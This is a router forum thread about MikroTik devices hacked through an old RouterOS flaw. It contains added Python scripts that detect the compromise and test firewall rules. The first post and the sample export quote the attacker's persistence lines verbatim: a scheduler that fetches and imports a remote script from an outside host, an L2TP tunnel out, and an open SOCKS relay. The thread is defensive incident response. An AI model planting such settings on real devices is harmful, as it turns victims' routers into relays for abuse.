David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

someone hacked my routers - can someone help?

Sun Jun 06, 2021 3:21 pm

I have an old routers network with ~100 routers
that have worked for ~5 years (and even more) without any problems.
Today I tried to enter 5 of them and couldn't enter using winbox/api/ftp,
only ssh.

When I entered I saw this in the /system scheduler:
/tool fetch url=http://zancetom.com/poll/afb843ea-4472-46b7-a1d0-acd9ecebaf1f mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
The file is one line:
/interface l2tp-client add name=lvpn keepalive-timeout=60 user=user5388942 password=pass5388942 connect-to=s88.leappoach.info disabled=no profile=default
I can see that it added these rules for me:
/ip socks
set enabled=yes port=5678
/ip firewall filter
add action=accept chain=input dst-port=5678 log-prefix="" protocol=tcp
/interface l2tp-client
add connect-to=s88.leappoach.info disabled=no name=lvpn password=pass5388942 \
    profile=default user=user538894


I have checked, and the IP the connection is coming from is 198.18.0.1

I have removed all the settings and checked that there are no new surprises (there are not so many settings in the router, so it's easy for me to see if there are settings I don't know).

This is what I have added in the firewall filter / IP service:
/ip firewall filter
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=10.0.0.0/24
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=172.16.0.0/16
add action=drop chain=input log-prefix="" protocol=tcp

/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes
My questions:
1. What is the damage I'm facing?
2. What does "socks" do? Where does it have access to?
3. Are the firewall/service rules I have added good?

Thanks,
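As an added example (not from the thread and not MikroTik's own tooling), this Python script parses a RouterOS export and flags the four indicators quoted in the post above: a scheduler that fetches and imports a remote script, an enabled SOCKS service, an input rule that opens the SOCKS port, and an L2TP client tunnel to an outside host. The sample export is constructed from the settings quoted above; the parser only handles the `menu path` / `add` / `set` / backslash-continuation layout of `/export`.

```python
import shlex

# Constructed sample export, modelled on the settings quoted in this thread
SAMPLE_EXPORT = """\
/system scheduler
add name=upd interval=1d on-event="/tool fetch url=http://zancetom.com/poll/afb843ea-4472-46b7-a1d0-acd9ecebaf1f mode=http dst-path=7wmp0b4s.rsc; /import 7wmp0b4s.rsc"
/ip socks
set enabled=yes port=5678
/ip firewall filter
add action=accept chain=input dst-port=5678 log-prefix="" protocol=tcp
/interface l2tp-client
add connect-to=s88.leappoach.info disabled=no name=lvpn password=pass5388942 \\
    profile=default user=user538894
"""

def parse_export(text):
    """Return (menu path, verb, {key: value}) for each command in a RouterOS export."""
    entries, section, buf = [], None, ""
    for raw in text.splitlines():
        line = buf + raw.strip()
        if line.endswith("\\"):          # long lines are wrapped with a trailing backslash
            buf = line[:-1] + " "
            continue
        buf = ""
        if line.startswith("/"):         # menu path such as "/ip socks"
            section = line
        elif line:
            verb, *tokens = shlex.split(line)   # honours "quoted values" like on-event
            params = dict(t.split("=", 1) for t in tokens if "=" in t)
            entries.append((section, verb, params))
    return entries

def find_indicators(entries):
    """Flag the persistence and relay settings described in this thread."""
    hits, socks_port = [], None
    for section, _verb, p in entries:
        event = p.get("on-event", "")
        if section == "/system scheduler" and "/tool fetch" in event and "/import" in event:
            hits.append(f"scheduler '{p.get('name')}' fetches and imports a remote script")
        elif section == "/ip socks" and p.get("enabled") == "yes":
            socks_port = p.get("port", "1080")
            hits.append(f"SOCKS proxy enabled on port {socks_port}")
        elif section == "/interface l2tp-client" and p.get("disabled", "no") == "no":
            hits.append(f"L2TP client '{p.get('name')}' tunnels to {p.get('connect-to')}")
    for section, _verb, p in entries:   # an input accept for the SOCKS port exposes the relay
        if (section == "/ip firewall filter" and p.get("chain") == "input"
                and p.get("action") == "accept" and p.get("dst-port") == socks_port):
            hits.append(f"input filter accepts SOCKS port {socks_port} from any source")
    return hits
```

Run it against the output of `/export` saved from a router; an empty list means none of these four patterns is present, not that the device is clean.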
 
StubArea51
Trainer
Posts: 1739
Joined: Fri Aug 10, 2012 6:46 am
Location: stubarea51.net

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 3:39 pm

What version of RouterOS are you running? This sounds like the behavior from exploits that were patched a couple of years ago.

This MUM presentation has an extensive overview of the vulnerabilities and remediation:

https://mum.mikrotik.com/presentations/ ... 679994.pdf
 
Jotne
Forum Guru
Posts: 3279
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 3:43 pm

Your router is used as a relay to hide the identity of a user for maybe illegal activity.
Netinstall seems to be the only valid solution to make sure everything is gone.

You do not write what version of RouterOS you have. I guess you have an older version that is open for the WinBox hack.
Strange that you have 1327 posts and have been on this forum since 2011, and that you have not seen this coming (with all the posts of users being hacked)???

VPN is the best solution to remotely administrate other routers; if that cannot be done, follow these steps.

1. Use another port than the default.
2. Use port knocking. This prevents someone from seeing open ports.
3. Use a long and good password.
4. Use an access list to prevent any random internet host from accessing your router.
5. Log everything. (See my signature for an example.)
6. Upgrade firmware to the latest stable release.
7. ++++

Just a quick search in Google for "zancetom.com mikrotik" gives:

viewtopic.php?t=172091
viewtopic.php?t=145577
viewtopic.php?t=158047
https://www.reddit.com/r/mikrotik/comme ... ipt_in_my/
++++++
 
David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 4:29 pm

As I said, it's a very old network,
and no one that uses it said something was wrong, so I have never checked it.
It's version 6.23 and 6.36,
using old MikroTik routers RB411.
I have tried to upgrade 3 of them to version 6.48 - the CPU is 100%,
and MikroTik said it can't be done.
This is why I still use this old version.

3. The password has been changed for all the routers after I entered and removed the unwanted settings.
4. Is this what I tried to do? Allow only 10.0.0.0/24 and 172.16.0.0/16 into my router (input)? I don't need any other address to access my router.
5. Funny that I asked you 2 weeks ago about splunk, without knowing I have a problem. So now I have to 'build' a server. :-)
6. Can't do it - the hardware is not "strong" enough.
 
anav
Forum Guru
Posts: 18959
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 5:36 pm

If you are paid to support these routers you need to give the money back!!!!!!!!!
 
Jotne
Forum Guru
Posts: 3279
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 7:52 pm

You should upgrade to a version that fixes the Winbox. I think it was 6.40.8.
But take care, MT did change the way switch / bridge works, so test it out before adding to production.

6.23 is more than 6 years old and there have been many security fixes, so an upgrade is needed.
If that is not possible, replace all routers that cannot be upgraded.
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 8:25 pm

And you wonder why there are so many botnets out there.
 
tdw
Forum Guru
Posts: 1841
Joined: Sat May 05, 2018 11:55 am

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 9:24 pm

using old MikroTik routers RB411
I have tried to upgrade 3 of them to version 6.48 - the CPU is 100%
and MikroTik said it can't be done.
RB4xx are still listed under MIPSBE on the downloads page. If you upgraded a compromised router there may be some malware which doesn't work well in newer versions of RouterOS and consumes all the CPU resources. Have you tried a clean installation with netinstall and configuring from an export (.rsc) rather than a backup (.backup)?

If they only have 32MB RAM you can disable any unused packages (e.g. hotspot, ipv6, mpls, routing) to make more memory available; I am still successfully using some RB750UP with v6.47.10.
 
rextended
Forum Guru
Posts: 11968
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: someone hacked my routers - can someone help?

Sun Jun 06, 2021 9:55 pm

The already "cracked" ones must be netinstalled,
the others protected with at least the default firewall rules
viewtopic.php?f=13&t=175129&p=856824#p856824
and the access services disabled on WAN and active only for internal IPs.

DO NOT update directly to 6.47+, first update to 6.44.6
https://download.mikrotik.com/routeros/ ... 6.44.6.npk
Inside are some particular procedures to remove junk from the routerboard.

Also, going directly to 6.47+ you risk losing user and password,
because MikroTik on successive versions changed the database format where username and password are stored.

Also a warning, because the bridge format changed from the master/slave mechanism to auto-switch all-in-bridge:
6.44.6 automatically converts the old format to the new, but keeps hardware offload off and fast forward off.
After the upgrade to 6.44.6 you must paste on the terminal:
/int bri set [find] fast-forward=yes
/int bri port set [find] hw=yes

6.42.10 is the last version where superchannel can be selected (licence or not);
after that, frequency-mode can only be "regulatory-domain".
If some of your devices are wireless, after that version,
if you do not set some counter-measures before the update,
your tx power on the devices is dropped according to national rules (and what you have set as antenna-gain).
 
David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hacked my routers - can someone help?

Mon Jun 07, 2021 7:52 am

I will check all the firewall rules, and see if I need to change something there for my case.
In the meanwhile, is what I did good?
The router is a hotspot unit - so will these rules make users unable to connect to the hotspot and the internet?
/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=22 disabled=no
set api address=10.0.0.0/24,172.16.0.0/16 port=8728 disabled=no
set winbox address=10.0.0.0/24,172.16.0.0/16 port=8291 disabled=no
set api-ssl disabled=yes

/ip firewall filter
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=10.0.0.0/24 
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=172.16.0.0/16 
add action=drop chain=input log-prefix="" protocol=tcp 


Also, can someone explain about the
/ip socks
What does it do? And how do they use it? What does the hacker "earn" by using this? - I can't seem to understand this.

Thanks,
 
jvanhambelgium
Forum Veteran
Posts: 985
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: someone hacked my routers - can someone help?

Mon Jun 07, 2021 8:43 am

The socks service will act like a proxy server. Basically your MikroTik can be used to attack others. The attacker will "relay" through your MikroTik and it appears to be coming from your MikroTik.
You can change whatever you want, but if the hacker (still) has access they can undo your changes. The only option is a CLEAN install, and update the OS to a recent one !!

Your services are now "shielded" indeed from others, so now only 10.x.x.x and 172.16.x.x can use them, BUT with some of the vulnerabilities on RouterOS these settings might be useless and can be bypassed anyway! For sure the WWW is disabled and that is good.
I'm not sure about other vulnerabilities on RouterOS over the past years, no clue if Winbox was also affected.


About your filter ... it will only help you to protect from INTERNAL hackers (those having source IP 10.0.0.0/24 & 172.16.0.0/16) => so probably users from your hotspots.

TO DO: These are TEMPORARY fixes, please NETINSTALL them as soon as possible, and update RouterOS to a recent version.
 
David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hacked my routers - can someone help?

Mon Jun 07, 2021 9:31 am

OK

About this:
About your filter ... it will only help you to protect from INTERNAL hackers (those having source IP 10.0.0.0/24 & 172.16.0.0/16) => so probably users from your hotspots.
If someone from the internet tries to enter the router - he will be blocked, no?
Because of this rule (it's under the allowed networks to the router):
add action=drop chain=input log-prefix="" protocol=tcp
 
jvanhambelgium
Forum Veteran
Posts: 985
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: someone hacked my routers - can someone help?

Mon Jun 07, 2021 9:37 am

OK

About this:
About your filter ... it will only help you to protect from INTERNAL hackers (those having source IP 10.0.0.0/24 & 172.16.0.0/16) => so probably users from your hotspots.
If someone from the internet tries to enter the router - he will be blocked, no?
Because of this rule (it's under the allowed networks to the router):
add action=drop chain=input log-prefix="" protocol=tcp
Yes indeed. All TCP traffic destined to the MikroTik device itself is blocked using this rule, regardless of what interface it's coming through.
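To check the reasoning in this exchange, here is an added example (not from the thread and not MikroTik code) that re-implements the first-match evaluation of the input chain in Python over the three rules quoted above. It assumes RouterOS's default of accepting a packet that no rule matches, and the probe addresses are constructed; it also goes one step beyond the reply by showing that the rules match TCP only, so UDP and ICMP to the router pass through this rule set untouched.

```python
import ipaddress

# The three input-chain rules posted in this thread, in the order RouterOS evaluates them
RULES = [
    {"action": "accept", "protocol": "tcp", "dst-port": {21, 22, 8728, 8291},
     "src-address": "10.0.0.0/24"},
    {"action": "accept", "protocol": "tcp", "dst-port": {21, 22, 8728, 8291},
     "src-address": "172.16.0.0/16"},
    {"action": "drop", "protocol": "tcp"},
]

def evaluate_input(rules, src, protocol, dst_port=None):
    """First matching rule decides; a packet no rule matches is accepted (RouterOS default)."""
    src_ip = ipaddress.ip_address(src)
    for rule in rules:
        if rule.get("protocol") and rule["protocol"] != protocol:
            continue
        if "dst-port" in rule and dst_port not in rule["dst-port"]:
            continue
        if "src-address" in rule and src_ip not in ipaddress.ip_network(rule["src-address"]):
            continue
        return rule["action"]
    return "accept"

# Constructed probes: packets addressed to the router itself, from inside and from the internet
PROBES = [
    ("10.0.0.9",    "tcp",  8291),   # winbox from the management LAN
    ("172.16.4.20", "tcp",  22),     # ssh from the hotspot range
    ("203.0.113.7", "tcp",  8291),   # winbox from the internet
    ("198.18.0.1",  "tcp",  5678),   # the socks port, from the address seen in the thread
    ("10.0.0.9",    "tcp",  5678),   # the socks port even from inside: not in the allowed list
    ("203.0.113.7", "udp",  161),    # non-TCP: no rule matches, so it is not dropped
    ("203.0.113.7", "icmp", None),   # ping from the internet, same reason
]

def run_probes(rules=RULES, probes=PROBES):
    """Map each probe to the verdict the rule set gives it."""
    return {(src, proto, port): evaluate_input(rules, src, proto, port)
            for src, proto, port in probes}

if __name__ == "__main__":
    for (src, proto, port), verdict in run_probes().items():
        print(f"{src:>13} {proto:<4} {port or '-':>5} -> {verdict}")
```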
 
David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: someone hacked my routers - can someone help?

Mon Jun 07, 2021 9:41 am

*** Up until now I have used a private APN / closed networks (without internet connection), so I almost didn't use the firewall rules.
I want to understand and learn what to do correctly from now on.


Thanks ,
 
mkx
Forum Guru
Posts: 11383
Joined: Thu Mar 03, 2016 10:23 pm

Re: someone hacked my routers - can someone help?

Mon Jun 07, 2021 11:11 am

All but high-end devices (which include CCR, CRS and RB1100 devices) come with a set of default firewall rules. One can see the default settings by executing the command

/system default-configuration print

(just beware that lines are truncated rather than wrapped around, so make sure you have a really wide terminal window when executing the command. If a line ends with a "greater than" sign (>), then the line is truncated).

The default setup can change from release to release, so as part of learning I'd purchase the cheapest device (hEX lite comes with a recommended price of 39.95 USD) and use it as student's material. It can come in handy also for lab tests. If you don't want to bother with problems due to low RAM and low permanent storage, you might want to get a unit with a decent amount of both (but devices with flash size greater than 16MB are not cheap ... the hEX (RB750Gr3) has a decent amount of RAM and comes with an MSRP of 60 USD).

Changes in the default setup don't get applied to an already installed device during upgrade, so it's wise to check the differences between the defaults and the running config from time to time.
 
rextended
Forum Guru
Posts: 11968
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: someone hacked my routers - can someone help?

Mon Jun 07, 2021 1:24 pm

...
the others protected from at least default firewall rules
viewtopic.php?f=13&t=175129&p=856824#p856824
...
 
rextended
Forum Guru
Posts: 11968
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: someone hacked my routers - can someone help?

Tue Sep 21, 2021 9:59 pm

The Italian Mafia... Pay those who can make a disaster so that they do not make a disaster....